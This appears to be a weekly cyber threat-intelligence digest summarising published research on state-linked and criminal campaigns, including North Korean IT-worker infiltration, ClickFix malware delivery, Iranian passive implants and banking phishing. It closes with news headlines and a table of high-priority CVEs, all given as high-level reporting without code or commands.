UNC5267 poses as IT workers to gain access to foreign organisations
Mandiant researchers observed IT workers linked to North Korea posing as non-North Korean nationals to secure jobs at foreign organisations. The group, tracked as UNC5267, has been active since 2018 and consists of individuals sent by North Korea to China and Russia, with smaller numbers in Africa and Southeast Asia, aiming to obtain jobs with Western companies, particularly in the United States tech sector. Their objectives include financial gain through illicit salary withdrawals, maintaining long-term access to networks for future exploitation, and potential espionage or disruptive activities. UNC5267 gains initial access by using stolen identities to apply for remote work positions, often as contractors. UNC5267 resumes typically list US addresses with education credentials from universities in Singapore, Japan, or Hong Kong.
North American transportation and logistics firms targeted in malware campaign
Since May 2024, Proofpoint researchers observed a cluster of activity targeting transportation and logistics companies in North America to deliver various malware payloads. Between May and July 2024, the attackers primarily delivered Lumma Stealer, StealC, or NetSupport. In August 2024, they shifted tactics, using new infrastructure and the ‘ClickFix’ technique to deliver malware, including DanaBot and Arechclient2. After compromising legitimate email accounts, the attackers inject malicious content into ongoing conversations to deliver the malware, including via Google Drive URLs or attachments. Campaigns using the ClickFix technique guide users through multiple steps to copy, paste, and run a Base64-encoded PowerShell script that downloads an MSI file to load DanaBot.
UNC1860 targets Middle East networks with passive implants designed for stealth
Mandiant researchers analysed the Iranian state-sponsored threat actor, UNC1860, who is assessed to likely be an initial access provider that enables operations targeting government and telecommunications spaces in the Middle East. UNC1860 uses specialised tooling and passive backdoors to gain persistent access to high-priority networks. UNC1860’s tooling includes the TEMPLEPLAY and VIROGREEN GUI-operated malware controllers. TEMPLEPLAY is used as a controller for the TEMPLEDOOR backdoor, whilst VIROGREEN is designed to exploit vulnerable SharePoint servers using CVE-2019-0604. UNC1860’s tradecraft and targeting overlaps with Shrouded Snooper, Scarred Manticore, and Storm-0861.The researchers note that APT34 and UNC1860 have both been observed operating within the same victim environments, possibly sharing tools and access.
SloppyLemming abuses cloud service providers to target entities in Asia
Cloudflare researchers identified the threat actor SloppyLemming abusing cloud service providers to conduct extensive operations that target government, defence, energy, telecommunications, and technology entities in Pakistan, as well as in Sri Lanka, Bangladesh, and China. The activity was first observed in late 2022 and remains ongoing. SloppyLemming uses a custom-built tool, named CloudPhish, to create a malicious Cloudflare Worker that handles credential logging logic and the exfiltration of victim credentials. The threat actor ultimately aims to gain access to targeted email accounts within organisations that provide intelligence value to them. As an initial infection vector, SloppyLemming uses spear phishing emails that have redirected victims to both credential harvesting pages and a scam website.
Phishing campaign targets ICICI Bank users with malicious app and website
Security researcher Rakesh Krishnan discovered a phishing campaign using a malicious host mimicking ICICI Bank and a malicious app disguised as ICICI Helpdesk. The malicious domain was registered on August 22nd, 2024, hosted under Hostinger, and has been tracked to an ASN location in Cyprus. The ASN has previously been used by TA557 to host PikaBot and has also hosted malware such as GuLoader, AgentTesla, and NetSupportRAT. The malicious app has been operational since August 2024 but has not yet been found in the wild. More than 500,000 downloads were observed on the Downloads Page, though Krishnan noted this could be an inflated number to trick users into installing the app.
Ransomware
Volume of blog posts by operators during the last week.
Cactus Ransomware Discloses Three New Alleged VictimsDaily Dark Web – Sep 25 2024Kransom Ransomware: New Threat Using DLL-Sideloading to Hijack Popular RPGANY.RUN – Sep 23 2024Muskogee City County Enhanced 911 Trust Authority Discloses Breach Earlier This YearDataBreaches.net – Sep 21 2024Valencia Ransomware explodes on the scene, claims California city, fashion giant, more as victimsThe Register – Sep 19 2024Kryptina RaaS | From Underground Commodity to Open Source ThreatSentinelOne – Feb 14 2024
Financial Services
A Threat Actor Claims to Sell Data of Israel Harel Insurance, Compromising Data of 1.8 Million RecordsDaily Dark Web – Sep 25 2024Financial Services Giant MoneyGram Systems Down After CyberattackThe Cyber Express – Sep 25 2024New Octo Android malware version impersonates NordVPN, Google ChromeBleeping Computer – Sep 24 2024Metropolitan Life Insurance Company Announces Data Breach Following Incident at Anonymous Service ProviderJD Supra – Sep 23 2024Threat Actors leverage Docker Swarm and Kubernetes to mine cryptocurrency at scaleDatadog Security Labs – Sep 23 2024
Geopolitics
Chinese Hackers Infiltrate U.S. Internet Providers in Cyber Espionage CampaignThe Hacker News – Sep 26 2024Russian hackers adopt new cyberwarfare tactics against UkraineEuromaidan Press – Sep 25 2024Cyberattack Disrupts Major Russian Banks – Ukrainian Intelligence SourceKyivPost – Sep 23 2024Solar Monitoring Solutions in Hacktivists’ CrosshairsCyble – Sep 20 2024Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APACTrend Micro – Sep 19 2024
High Priority Vulnerabilities
| Name | Software | Base Score |
Temp Score |
|
|---|---|---|---|---|
| CVE-2024-8963 | CSA | 9.1 | 7.0 | |
| Related: Critical path traversal flaw patched in Ivanti CSA | ||||
| CVE-2024-45229 | Director | 6.6 | 6.3 | |
| Related: Versa Networks Patches Vulnerability Exposing Authentication Tokens | ||||
| CVE-2024-7490 | Advanced Software Framework | 9.8 | 9.8 | |
| Related: Critical Flaw in Microchip ASF Exposes IoT Devices to Remote Code Execution Risk | ||||
| CVE-2021-21972 | Cloud Foundation | 9.8 | 6.0 | |
| Related: Twelve hacktivist group uses LockBit in attacks targeting Russian organisations | ||||
| CVE-2017-0199 | Office | 7.8 | 6.0 | |
| Related: Remcos RAT campaigns target users in Bulgaria and Turkey | ||||